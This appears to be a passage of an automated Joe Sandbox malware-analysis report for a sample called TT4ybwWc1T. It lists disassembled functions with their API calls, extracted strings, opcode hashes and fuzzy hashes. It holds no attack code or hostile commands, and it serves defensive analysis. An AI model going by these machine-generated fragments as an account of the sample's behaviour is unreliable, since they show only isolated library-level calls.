Instruction Fuzzy Hash: 67213DB110C3809FD310CF65C841B9BB7E8BB9A618F504E1EF5A993B81D735D5088BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C916480 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6C916518

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

__CxxThrowException@8.LIBCMT ref: 6C916558

Strings

Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 6C9164E7
Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 6C916527

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
API String ID: 3476068407-3345525433
Opcode ID: 74c34659d30ba4af0433529317ed4daee7587f5e3cedc91d5a759272432d4433
Instruction ID: 0e852eca048b8825df4547219e8cc28d9bbb9616491c3746a2620f2c98020841
Opcode Fuzzy Hash: 74c34659d30ba4af0433529317ed4daee7587f5e3cedc91d5a759272432d4433
Instruction Fuzzy Hash: 0E21F07250C3809EC320DF74C941BDAB3E8BB9A648F404E2DE589D3E80EB74D408CA63

Uniqueness

Uniqueness Score: -1.00%

Function 6C8EFDE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(?,?,00000000,6C8EFA73,?,65628154), ref: 6C8EFE2D
CloseHandle.KERNEL32(?,?,00000000,6C8EFA73,?,65628154), ref: 6C8EFE43
CloseHandle.KERNEL32(00000000,?,00000000,6C8EFA73,?,65628154), ref: 6C8EFE4E

Strings

.Wu, xrefs: 6C8EFE3C

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: CloseHandle$FileUnmapView
String ID: .Wu
API String ID: 260491571-3424199868
Opcode ID: e1ae62ac6b010ce51bdd6303b44d67d05da5c82860b1cb7caed5d8d099dd5571
Instruction ID: dc9157772844099dfac52819afd232e156218951d651a7b6ec463776bbad4baf
Opcode Fuzzy Hash: e1ae62ac6b010ce51bdd6303b44d67d05da5c82860b1cb7caed5d8d099dd5571
Instruction Fuzzy Hash: BE012DB17882024EE730CA76F950B9773B55BAF318B295D1AD4854B913E234F881DB10

Uniqueness

Uniqueness Score: -1.00%

Function 6C91C120 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C91C14E

Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C9490ED
Part of subcall function 6C9490D8: __CxxThrowException@8.LIBCMT ref: 6C949102
Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C949113

Strings

gfff, xrefs: 6C91C15A
gfff, xrefs: 6C91C129
vector<T> too long, xrefs: 6C91C149

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: gfff$gfff$vector<T> too long
API String ID: 1823113695-3369487235
Opcode ID: fca864457f9dafaf724e0acb2e8f5db2a62188fbc2ea7bce9f9b38aec9b01a14
Instruction ID: b2029c357bab94f85784f404f91b48e1265083041473e824b02483e28048c4e6
Opcode Fuzzy Hash: fca864457f9dafaf724e0acb2e8f5db2a62188fbc2ea7bce9f9b38aec9b01a14
Instruction Fuzzy Hash: 7F01D173F080295F8310993FED4545AEA9BABD83A4319CA3AE608DBB48E531D90243C2

Uniqueness

Uniqueness Score: -1.00%

Function 074E0F14 Relevance: 6.5, Strings: 5, Instructions: 201COMMON

Download Yara Rule

Strings

Gq, xrefs: 074E1243
LOOK, xrefs: 074E0F6A
LOOK, xrefs: 074E1081
HERE, xrefs: 074E0F6F
HERE, xrefs: 074E1086

Memory Dump Source

Source File: 00000000.00000002.1384617521.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID: HERE$HERE$LOOK$LOOK$Gq
API String ID: 0-2026200418
Opcode ID: ecc3ea1081f10150975c2f958e7c5fbf7bb7186d366befde63ba94ffb028915b
Instruction ID: a9196605c73b708ded7b1aeba64ca1d340e938b7be2ee5d9cb1c798e313b2c2c
Opcode Fuzzy Hash: ecc3ea1081f10150975c2f958e7c5fbf7bb7186d366befde63ba94ffb028915b
Instruction Fuzzy Hash: 6BA180B4E00229CFDB68DF68C994BD9B7B1AB48310F1481EAD549AB360DB309E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C9225D0 Relevance: 6.2, APIs: 4, Instructions: 206COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6C922677
_memmove.LIBCMT ref: 6C9226E6
_memmove.LIBCMT ref: 6C922746
__CxxThrowException@8.LIBCMT ref: 6C9227CD

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: _memmove$Exception@8Throw
String ID:
API String ID: 2655171816-0
Opcode ID: 39f485b3074d280644ac0509a8f0958f478dfc5136dcccd269fd9567342f1006
Instruction ID: 7bb7c097a477ecbf1b0a2d1217c37ba13a807f81da83e4bf784c3128999283aa
Opcode Fuzzy Hash: 39f485b3074d280644ac0509a8f0958f478dfc5136dcccd269fd9567342f1006
Instruction Fuzzy Hash: 9D519275328B068FD704DF68D984E2EB3E9AFD8614F10492DE495C7744EB38E9098B92

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FD4B0 Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

std::exception::exception.LIBCMT ref: 6C8FD5E4
__CxxThrowException@8.LIBCMT ref: 6C8FD5F9
std::exception::exception.LIBCMT ref: 6C8FD608
__CxxThrowException@8.LIBCMT ref: 6C8FD61D

Part of subcall function 6C949BB5: std::exception::exception.LIBCMT ref: 6C949C04
Part of subcall function 6C949BB5: std::exception::exception.LIBCMT ref: 6C949C1E
Part of subcall function 6C949BB5: __CxxThrowException@8.LIBCMT ref: 6C949C2F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: 8dad2db7172b63d169f093ad9dcf70870d071a6c7be1ce3328b99f16c7269145
Instruction ID: 2edc37aec6d7c9eebcce4a74412ecba1fab60f9e091b70c4cd709df4131bbfe1
Opcode Fuzzy Hash: 8dad2db7172b63d169f093ad9dcf70870d071a6c7be1ce3328b99f16c7269145
Instruction Fuzzy Hash: 395168B1A01649AFDB14CFA8C980A89FBF4FB1D304F50866AE519D7B40D731EA14CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C905F00 Relevance: 6.1, APIs: 4, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

std::exception::exception.LIBCMT ref: 6C906035
__CxxThrowException@8.LIBCMT ref: 6C90604A
std::exception::exception.LIBCMT ref: 6C906059
__CxxThrowException@8.LIBCMT ref: 6C90606E

Part of subcall function 6C949BB5: std::exception::exception.LIBCMT ref: 6C949C04
Part of subcall function 6C949BB5: std::exception::exception.LIBCMT ref: 6C949C1E
Part of subcall function 6C949BB5: __CxxThrowException@8.LIBCMT ref: 6C949C2F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: 191d0967a92d18af44dd449c7d3f579bed2f705119f19a43c7944d02a0899e80
Instruction ID: 335bd7b43ff4b8f453aee5d1a8fad4b79d5880b31a8995bd65340f4774da9e86
Opcode Fuzzy Hash: 191d0967a92d18af44dd449c7d3f579bed2f705119f19a43c7944d02a0899e80
Instruction Fuzzy Hash: 895149B1A0164AAFD704CFA8C980A89BBF4FF19304F10866EE519D7B40D775E954CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FDE50 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6C8FDE81
VariantClear.OLEAUT32(?), ref: 6C8FDF3C
VariantClear.OLEAUT32(?), ref: 6C8FDF6D
VariantClear.OLEAUT32(?), ref: 6C8FDF8B

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$Clear$Init
String ID:
API String ID: 3740757921-0
Opcode ID: 49d0f5e301ac0528add4c97b594846ca306dea201af2d23e51dd41dc83c6ee72
Instruction ID: 8bcd67c01f3b0ed4314b647b7215e5a7f6aca2322fbd4f3b3841cd4d074964d5
Opcode Fuzzy Hash: 49d0f5e301ac0528add4c97b594846ca306dea201af2d23e51dd41dc83c6ee72
Instruction Fuzzy Hash: FD41BB322082419FD700DF2AC940E56B7E4FF9A750F148A6EFA54DB790D731E906CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C905DB0 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

std::exception::exception.LIBCMT ref: 6C905E87
__CxxThrowException@8.LIBCMT ref: 6C905E9C
std::exception::exception.LIBCMT ref: 6C905EAB
__CxxThrowException@8.LIBCMT ref: 6C905EC0

Part of subcall function 6C949BB5: std::exception::exception.LIBCMT ref: 6C949C04
Part of subcall function 6C949BB5: std::exception::exception.LIBCMT ref: 6C949C1E
Part of subcall function 6C949BB5: __CxxThrowException@8.LIBCMT ref: 6C949C2F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: 6bfd83d22cddbe7fb56b5508f6cbf35b58f8dffb2cb1b57b84f6c3511f74a16b
Instruction ID: e4ee28d05635b652dd37485a637457ebe0deba9d0f58d904fc8dc6b5ba3cd20f
Opcode Fuzzy Hash: 6bfd83d22cddbe7fb56b5508f6cbf35b58f8dffb2cb1b57b84f6c3511f74a16b
Instruction Fuzzy Hash: 5A416DB19017489FD720CF69C980A8AFBF4FF19304F50896ED89A97B41D771E508CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FD360 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

std::exception::exception.LIBCMT ref: 6C8FD437
__CxxThrowException@8.LIBCMT ref: 6C8FD44C
std::exception::exception.LIBCMT ref: 6C8FD45B
__CxxThrowException@8.LIBCMT ref: 6C8FD470

Part of subcall function 6C949BB5: std::exception::exception.LIBCMT ref: 6C949C04
Part of subcall function 6C949BB5: std::exception::exception.LIBCMT ref: 6C949C1E
Part of subcall function 6C949BB5: __CxxThrowException@8.LIBCMT ref: 6C949C2F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: c2b0163d38198ce137ee623f7b605ec92bf1a1ecf4d1ec79585188f7484ec381
Instruction ID: b2ba714ab8b8d60d66e61e0b70d3f3b4fc154408c8069ec30f292e46d678e2ca
Opcode Fuzzy Hash: c2b0163d38198ce137ee623f7b605ec92bf1a1ecf4d1ec79585188f7484ec381
Instruction Fuzzy Hash: 73414AB19017489FD720CFA9C980A8AFBF4FF19304F50896ED99A97B41D771E508CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C942B80 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

Part of subcall function 6C916480: __CxxThrowException@8.LIBCMT ref: 6C916518
Part of subcall function 6C916480: __CxxThrowException@8.LIBCMT ref: 6C916558

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

std::exception::exception.LIBCMT ref: 6C942C9A
__CxxThrowException@8.LIBCMT ref: 6C942CB1
std::exception::exception.LIBCMT ref: 6C942CC3
__CxxThrowException@8.LIBCMT ref: 6C942CDA

Part of subcall function 6C949BB5: std::exception::exception.LIBCMT ref: 6C949C04
Part of subcall function 6C949BB5: std::exception::exception.LIBCMT ref: 6C949C1E
Part of subcall function 6C949BB5: __CxxThrowException@8.LIBCMT ref: 6C949C2F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Exception@8Throw$std::exception::exception$_malloc
String ID:
API String ID: 3942750879-0
Opcode ID: 6570086498fccddbb022bc0a86fd0f76e1034e4ca944c0975c67679baa6ca0f7
Instruction ID: d5ba61a766ccf41c4866daf1f96bd814b157b5aab0bcbc5da18338103a11482c
Opcode Fuzzy Hash: 6570086498fccddbb022bc0a86fd0f76e1034e4ca944c0975c67679baa6ca0f7
Instruction Fuzzy Hash: D44148B15187419FD314CF59C480A4AFBF8FFA9714F508A2EE19A87B90D7B0E508CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C90B580 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(6C9602A0), ref: 6C90B5D5
VariantInit.OLEAUT32(?), ref: 6C90B5E2
VariantClear.OLEAUT32(?), ref: 6C90B685
VariantClear.OLEAUT32(6C9602A0), ref: 6C90B68B

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 2db58f68d744329df4089f78a663859925a187b48f51d4d6f9f64ca1cc6e0b29
Instruction ID: 81787d51ea05af664d77d456e58145ca20bb58f5feb97c88478a474c7efa240f
Opcode Fuzzy Hash: 2db58f68d744329df4089f78a663859925a187b48f51d4d6f9f64ca1cc6e0b29
Instruction Fuzzy Hash: 1841A072A01209AFDB00DFA9C980B9AF7F9FF99314F24419EE90497750D736E901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6C9588C9 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6C9588FD
__isleadbyte_l.LIBCMT ref: 6C958930
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 6C958961
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 6C9589CF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: daa03ffd4c239c6534da538d3d096fe9de26e6481c167ec0179b72712b681ecc
Instruction ID: 1f9aaf79487eac1aca1283f2e6dffedc6f8341e43d2bb31fde3818fffbae2981
Opcode Fuzzy Hash: daa03ffd4c239c6534da538d3d096fe9de26e6481c167ec0179b72712b681ecc
Instruction Fuzzy Hash: 25310771A65346EFDB08DFA4C8909BD3BB8FF01314F5445AAE1A09B590D330D960CB59

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F8470 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

InitializeCriticalSection.KERNEL32(00000000,00000000,6C8F5D89,00000000,00000004,00000000,?,00000000,00000000), ref: 6C8F84EA
InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000), ref: 6C8F84F0
std::exception::exception.LIBCMT ref: 6C8F853C
__CxxThrowException@8.LIBCMT ref: 6C8F8551

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
